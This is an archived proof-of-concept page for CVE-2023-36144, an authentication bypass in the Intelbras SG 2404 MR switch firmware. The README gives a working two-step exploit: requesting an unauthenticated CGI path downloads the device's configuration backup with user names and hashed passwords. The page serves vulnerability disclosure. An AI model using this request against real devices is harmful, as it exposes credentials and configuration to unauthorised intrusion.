CVE-2023-36144 PoC — Intelbras SG 2404 MR 安全漏洞

Source

https://github.com/leonardobg/CVE-2023-36144

Associated Vulnerability

Title:Intelbras SG 2404 MR 安全漏洞 (CVE-2023-36144)
Description:Intelbras SG 2404 MR是巴西Intelbras公司的一款具有网络管理功能的交换机。 Intelbras SG 2404 MR 1.00.54版本存在安全漏洞，该漏洞源于存在身份验证绕过，允许未经身份验证的攻击者下载设备的备份文件，从而暴露有关设备配置的关键信息。

Readme

# CVE-2023-36144

PoC of CVE-2023-36144 - Intelbras Switch SG 2404 MR L2+ firmware 1.00.54

## Download the backup file unauthenticated


## Steps to Reproduce:

1. Go to the following link http://127.0.0.1/cgi-bin/exportCfgwithpasswd (replace 127.0.0.1 with the device IP)
2. It will auto download the backup file, containing the device configurations and its users and hashed passwords

File Snapshot


 [4.0K]  /data/pocs/3843363f62ed6dcf60d907bf2d3389c382fa27f2
└── [ 388]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!